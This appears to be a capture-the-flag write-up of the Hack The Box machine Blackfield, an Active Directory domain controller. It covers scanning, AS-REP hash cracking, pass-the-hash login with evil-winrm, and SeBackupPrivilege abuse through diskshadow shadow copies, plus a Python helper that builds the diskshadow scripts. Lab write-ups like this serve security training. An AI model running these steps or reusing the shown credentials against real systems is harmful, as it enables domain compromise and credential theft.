┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:57 CST
Nmap scan report for 10.10.10.192
Host is up (0.079s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
49677/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,593,3268,5985 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:59 CST
Nmap scan report for 10.10.10.192
Host is up (0.074s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-19 21:48:44Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

The usual DC port set (DNS, Kerberos, RPC, SMB, LDAP/GC, WinRM), host name DC01, domain BLACKFIELD.local. One detail worth keeping in mind: the Kerberos banner reports a server time of 21:48:44Z while the scan started at 22:59 CST on the attacking host. Whichever CST that is, the two clocks differ by roughly seven hours, and Kerberos rejects requests outside a five-minute skew, so anything that authenticates with Kerberos rather than NTLM needs the local clock adjusted (or the tool wrapped with faketime) first.
Add a hosts entry. The LDAP banner gives the domain as BLACKFIELD.local and the host as DC01, so map 10.10.10.192 to blackfield.local and dc01.blackfield.local rather than just black.local; the bloodhound-python run further down needs the dc01.blackfield.local name to resolve for its Kerberos step.
Enum
LDAP cannot be enumerated anonymously: the anonymous bind has no rights to read the directory.
Enumerate the shares anonymously:
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u guest
[+] IP: 10.10.10.192:445    Name: blackfield.local    Status: Authenticated
        Disk                    Permissions     Comment
        ----                    -----------     -------
        ADMIN$                  NO ACCESS       Remote Admin
        C$                      NO ACCESS       Default share
        forensic                NO ACCESS       Forensic / Audit share.
        IPC$                    READ ONLY       Remote IPC
        NETLOGON                NO ACCESS       Logon server share
        profiles$               READ ONLY
        SYSVOL                  NO ACCESS       Logon server share
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:10 DONE (2024-09-19 23:55) 0.09842g/s 1410Kp/s 1410Kc/s 1410KC/s #1WHORE..#*bebe#*
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
#00^BlackKnight is the support user's password. It does not get a WinRM session, so back to SMB with the credentials:
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
<SNIP>
[+] IP: 10.10.10.192:445    Name: blackfield.local    Status: Authenticated
        Disk                    Permissions     Comment
        ----                    -----------     -------
        ADMIN$                  NO ACCESS       Remote Admin
        C$                      NO ACCESS       Default share
        forensic                NO ACCESS       Forensic / Audit share.
        IPC$                    READ ONLY       Remote IPC
        NETLOGON                READ ONLY       Logon server share
        profiles$               READ ONLY
        SYSVOL                  READ ONLY       Logon server share
┌──(mikannse㉿kali)-[~/HTB/blackfield/blood]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 18 computers
INFO: Found 0 trusts
INFO: Done in 00M 18S

The TGT step fails at name resolution (dc01.blackfield.local is not in the hosts file, and that lookup does not go through the -ns nameserver), so the tool falls back to NTLM; the LDAP collection itself still completes.
┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

svc_backup is in Backup Operators, which is where SeBackupPrivilege and SeRestorePrivilege come from. With SeBackupPrivilege enabled a process can open any file for reading with backup semantics regardless of its ACL, and on a domain controller that includes files that are normally locked or unreadable, so a shadow copy of C: is the next step.
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ unix2dos cmd
unix2dos: converting file cmd to DOS format...
The line endings have to be converted to CRLF before uploading: diskshadow expects a Windows text file and does not parse a script with bare LF endings correctly. It is then run from C:\Windows\Temp because diskshadow writes working files into the current directory, which therefore has to be writable by the user.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload cmd
Info: Uploading /home/mikannse/HTB/blackfield/cmd to C:\Users\svc_backup\Documents\cmd
Data: 120 bytes of 120 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> mv cmd C:\Windows\Temp
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd C:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> diskshadow /s cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  9/20/2024 3:56:35 AM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {581f125e-ba6a-4553-a945-f2574bc04948} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} set as environment variable.

Querying all shadow copies with the shadow copy set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f}

        * Shadow copy ID = {581f125e-ba6a-4553-a945-f2574bc04948}               %temp%
                - Shadow copy set: {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 9/20/2024 3:56:36 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% h:
-> %temp% = {581f125e-ba6a-4553-a945-f2574bc04948}
The shadow copy was successfully exposed as h:\.
-> exit
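Two practical loose ends of the procedure above: the CRLF requirement that forced the unix2dos step, and the fact that `set context persistent` creates a shadow copy that outlives the session and should be unexposed and deleted afterwards. The block below is an added example (not code from the write-up) for the attacking host: it emits the same diskshadow script already in CRLF form, rejects a script that still has bare LF endings, parses the diskshadow transcript for the shadow ID and device name, and builds the matching cleanup script. Function names and output file names are this example's own; the sample transcript is taken from the session above.

```python
"""DiskShadow script builder and output parser for the attacking host (added example)."""
import re

CRLF = "\r\n"


def build_expose_script(volume="c:", alias="temp", drive="h:"):
    """The write-up's five commands with CRLF endings, so no unix2dos pass is
    needed before `upload`."""
    lines = ["set context persistent nowriters",
             f"add volume {volume} alias {alias}",
             "create",
             f"expose %{alias}% {drive}",
             "exit"]
    return (CRLF.join(lines) + CRLF).encode("ascii")


def build_cleanup_script(shadow_id, drive="h:"):
    """A persistent shadow outlives the session; unexpose and delete the one we made."""
    lines = [f"unexpose {drive}", f"delete shadows id {shadow_id}", "exit"]
    return (CRLF.join(lines) + CRLF).encode("ascii")


def has_only_crlf(script):
    """True when every line break is CRLF; a bare LF anywhere is the unix2dos pitfall."""
    return b"\n" in script and b"\n" not in script.replace(b"\r\n", b"")


_PATTERNS = {
    "shadow_id": r"Shadow copy ID = (\{[0-9a-fA-F-]{36}\})",
    "shadow_set_id": r"Shadow copy ?set: (\{[0-9a-fA-F-]{36}\})",
    "device": r"Shadow copy device name: (\S+)",
    "exposed_as": r"successfully exposed as (\S+?)\.?\s*$",
}


def parse_diskshadow_output(text):
    """Pull out the identifiers later commands and the cleanup script need."""
    found = {}
    for key, pattern in _PATTERNS.items():
        match = re.search(pattern, text, re.MULTILINE)
        if match:
            found[key] = match.group(1)
    return found


# Trimmed transcript from the session above, used as the parser's sample input.
SAMPLE_OUTPUT = r"""
-> create
Alias temp for shadow ID {581f125e-ba6a-4553-a945-f2574bc04948} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} set as environment variable.
        * Shadow copy ID = {581f125e-ba6a-4553-a945-f2574bc04948}               %temp%
                - Shadow copy set: {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f}       %VSS_SHADOW_SET%
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Attributes:  No_Auto_Release Persistent No_Writers Differential
-> expose %temp% h:
The shadow copy was successfully exposed as h:\.
-> exit
"""

if __name__ == "__main__":
    with open("cmd", "wb") as fh:            # upload this one with evil-winrm
        fh.write(build_expose_script())
    info = parse_diskshadow_output(SAMPLE_OUTPUT)
    with open("cleanup", "wb") as fh:        # run later: diskshadow /s cleanup
        fh.write(build_cleanup_script(info["shadow_id"]))
    print(info)
```

The cleanup script is uploaded and run the same way as the first one (`diskshadow /s cleanup` from a writable directory); `delete shadows id` takes the shadow ID the parser recovered, which is the value diskshadow also stored in the %temp% alias.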